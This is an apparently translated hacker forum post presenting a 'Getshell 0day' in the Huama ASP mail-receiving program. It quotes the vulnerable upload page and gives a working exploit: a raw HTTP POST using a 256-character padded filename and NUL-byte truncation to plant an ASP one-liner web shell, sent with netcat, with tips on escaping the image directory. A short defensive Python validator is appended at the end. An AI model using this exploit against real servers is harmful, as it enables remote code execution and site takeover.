花马收信箱 (Huama mail-receiving box) Getshell 0day
By: rubbish
Fingerprint: the copyright notice is visible on login.asp, although some installations have changed that path. In addition, a wsidny.asp exists in the root directory.
The filtering throughout the whole program is very strict; you can tell it was written by a professional security person. The only exploitable spot is this wsidny.asp.
Look at the code:
```asp
<!-- #include file="conn.asp"-->
<%
Server.ScriptTimeout = 36000
PostSize = Request.TotalBytes
if postsize=0 then
    response.End()
end if
BytesRead = 0
ReadSize=256
HeadSize=256
' The first 256 bytes of the raw POST body are taken as the file name
filename = Request.BinaryRead(ReadSize)
BytesRead = BytesRead + ReadSize
' Everything after them is the file content
PostData = Request.BinaryRead(PostSize - BytesRead)
StoreFile(filename)

Function Bytes2bStr(vin)
    if lenb(vin) =0 then
        Bytes2bStr = ""
        exit function
    end if
    Dim BytesStream,StringReturn
    set BytesStream = Server.CreateObject("ADODB.Stream")
    BytesStream.Type = 2
    BytesStream.Open
    BytesStream.WriteText vin
    BytesStream.Position = 0
    BytesStream.Charset = "gb2312"
    BytesStream.Position = 2
    StringReturn = BytesStream.ReadText
    BytesStream.close
    set BytesStream = Nothing
    Bytes2bStr = StringReturn
End Function

Function StoreFile(filename)
    filea=Bytes2bStr(filename)
    filea=LCase(filea)
    ' Extension check: substring search of the last dot-separated part in the allowed list
    if instr(filea,".")>0 then
        fileb=split(filea,".")
        num2=ubound(fileb)
        if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then
            filea=filea
        else
            filea=filea&".gif"
        end if
    else
        filea=filea&".gif"
    end if
    ' The unsanitized name is passed straight to MapPath
    Path=server.MapPath(imgFolder&filea)
    Set oFileStream = CreateObject ("ADODB.Stream")
    oFileStream.Type = 1
    oFileStream.Mode = 3
    oFileStream.Open
    oFileStream.Write(PostData)
    oFileStream.SaveToFile Path,2
    oFileStream.Close
    Set oFileStream = Nothing
End Function

Response.Write PostSize
Response.Write " bytes were read."
%>
```
I couldn't figure out what this page is for; perhaps it generates images for breaking secret-question protection. At first I wanted to build a form locally and submit it directly, uploading an image trojan with a `;` in the name, but because the data is read with Request.BinaryRead, url-encoded parameters cannot be retrieved. So I switched to sending the packet with VBS. Here there was another problem: the path is taken from the first 256 characters, which exceeds the maximum length Server.MapPath supports, so I thought of using \00 truncation: capture the HTTP request sent by the VBS, write the truncation in UE (UltraEdit), then submit. With the include file removed the test succeeded, but with the include present it still errored. That's because the conn.asp included up front itself includes fsql.asp, an anti-injection page that checks Request.Form, and once Request.Form has been called, Request.BinaryRead can no longer be called without throwing an error. So what is the point of this page at all?
I was stuck here for a long time. Then I tried removing the Content-Type: application/x-www-form-urlencoded header and submitting, and found that the upload actually succeeded, and only then realized I had been an idiot all along. With that header removed, IIS assumes no parameters were submitted in form format, so Request.Form receives no data and no longer conflicts with the later Request.BinaryRead.
Here is the exploitation method:
```http
POST /DNFZONX/wsidny.asp HTTP/1.1
Accept-Language: zh-cn
Content-Length: 284
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.fuck.com
Connection: Keep-Alive

a.asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%>
```
The one-liner must be preceded by exactly 256 characters. Then, in UE, replace the space with \00, change the Host header and so on, and submit with NC (netcat). If the response contains "xxx bytes were read." it succeeded, and the file is img/a.asp under the target folder. If the image directory cannot be found or is not executable, use ../ or similar to break out of it; just make sure exactly 256 characters precede the one-liner.
Tested successfully locally.
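As an added defensive example (not code from the original post or from the program it describes), here is a Python validator that rejects the name patterns StoreFile() above lets through: NUL bytes, path separators and traversal, and extensions that merely substring-match the allow-list. The allow-list and the 256-byte name field come from the code above; the random server-side basename and the sample inputs are assumptions of this example.

```python
import os
import re
import secrets

# Extensions wsidny.asp intended to allow (copied from its InStr() list).
ALLOWED_EXT = {"jpg", "gif", "jpeg", "png", "bmp"}
# The original reads the name from the first 256 bytes of the raw POST body.
NAME_FIELD_SIZE = 256


def validate_upload_name(raw_name: bytes):
    """Return the validated extension for a client-supplied name, or None.

    Rejects what the original StoreFile() mishandles: embedded NUL bytes
    (which truncate the path before the appended ".gif" is seen), directory
    separators and "..", over-long or multi-extension names, and extensions
    that only partially match the allow-list (the original used InStr()).
    """
    if not raw_name or len(raw_name) > NAME_FIELD_SIZE:
        return None
    if b"\x00" in raw_name:          # NUL truncation attempt
        return None
    try:
        name = raw_name.decode("ascii")
    except UnicodeDecodeError:       # keep the allow-list simple: ASCII only
        return None
    name = name.strip().lower()
    # Any path component or traversal sequence is rejected outright rather
    # than "fixed", so imgFolder cannot be escaped with ../ or a drive prefix.
    if "/" in name or "\\" in name or ".." in name or ":" in name:
        return None
    m = re.fullmatch(r"[a-z0-9_-]{1,64}\.([a-z0-9]{1,5})", name)
    if m is None:
        return None
    # Exact set membership, not a substring search.
    ext = m.group(1)
    return ext if ext in ALLOWED_EXT else None


def choose_storage_path(img_folder: str, raw_name: bytes):
    """Pick the on-disk path for an upload, or None if the name is rejected.

    The client-supplied name is never used for the stored file: only its
    validated extension survives, attached to a random server-generated
    basename (an assumed design choice of this example).
    """
    ext = validate_upload_name(raw_name)
    if ext is None:
        return None
    return os.path.join(img_folder, f"{secrets.token_hex(16)}.{ext}")
```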